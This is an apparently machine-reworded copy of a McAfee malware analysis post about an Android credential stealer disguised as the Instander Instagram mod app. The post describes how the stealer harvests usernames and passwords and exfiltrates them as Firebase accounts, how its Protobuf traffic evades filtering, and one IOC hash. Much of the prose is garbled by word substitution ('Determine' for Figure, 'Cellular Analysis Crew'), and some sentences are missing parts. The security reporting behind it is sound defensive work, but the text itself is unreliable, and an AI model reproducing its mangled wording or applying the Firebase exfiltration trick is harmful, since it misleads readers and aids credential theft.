Instagram credentials Stealer: Disguised as Mod App

Authored by Dexter Shin 

McAfee’s Cellular Analysis Crew launched a brand new Android malware concentrating on Instagram customers who wish to enhance their followers or likes within the final put up. As we researched extra about this menace, we discovered one other malware kind that makes use of totally different technical strategies to steal person’s credentials. The goal is customers who are usually not glad with the default features offered by Instagram. Varied Instagram modification utility already exists for these customers on the Web. The brand new malware we discovered pretends to be a well-liked mod app and steals Instagram credentials. 

Conduct evaluation 

Instander is without doubt one of the well-known Instagram modification purposes out there for Android units to assist Instagram customers entry additional useful options. The mod app helps importing high-quality photos and downloading posted images and movies. 

The preliminary screens of this malware and Instander are related, as proven under. 

Determine 1. Instander official app(Left) and Mmalware(Proper) 

Subsequent, this malware requests an account (username or e-mail) and password. Lastly, this malware shows an error message no matter whether or not the login data is appropriate. 

Determine 2. Malware requests account and password 

The malware steals the person’s username and password in a really distinctive manner. The principle trick is to make use of the Firebase API. First, the person enter worth is mixed with This worth and static password(=kamalw20051) are then despatched through the Firebase API, createUserWithEmailAndPassword. And subsequent, the password course of is similar. After receiving the person’s account and password enter, this malware will request it twice. 

Figure 3. Main method to use Firebase API
Determine 3. Major technique to make use of Firebase API

Since we can’t see the dashboard of the malware creator, we examined it utilizing the identical API. Because of this, we checked the person enter worth in plain textual content on the dashboard. 

Figure 4. Firebase dashboard built for testing
Determine 4. Firebase dashboard constructed for testing

In accordance with the Firebase doc, createUserWithEmailAndPassword API is to create a brand new person account related to the required e-mail tackle and password. As a result of the primary parameter is outlined as e-mail patterns, the malware creator makes use of the above code to create e-mail patterns no matter person enter values. 

It’s an API for creating accounts within the Firebase in order that the administrator can examine the account title within the Firebase dashboard. The sufferer’s account and password have been requested as Firebase account title, so it must be seen as plain textual content with out hashing or masking. 

Community visitors 

As an attention-grabbing level on the community visitors of the malware, this malware communicates with the Firebase server in Protobuf format within the community. The preliminary configuration of this Firebase API makes use of the JSON format. Though the Protobuf format is readable sufficient, it may be assumed that this malware creator deliberately makes an attempt to obfuscate the community visitors by the extra settings. Additionally, the area used for knowledge switch( is managed by Google. As a result of it’s a area that’s too frequent and never harmful, many community filtering and firewall options don’t detect it. 


As talked about, customers ought to at all times watch out about putting in third occasion apps. Except for the forms of malware we’ve launched thus far, attackers try to steal customers’ credentials in quite a lot of methods. Subsequently, it is best to make use of safety software program in your cell units and at all times preserve updated. 

Fortuitously, McAfee Cellular Safety is ready to detect this as Android/InstaStealer and shield you from related threats. For extra data go to  McAfee Cellular Safety 

Indicators of Compromise 


  • 238a040fc53ba1f27c77943be88167d23ed502495fd83f501004356efdc22a39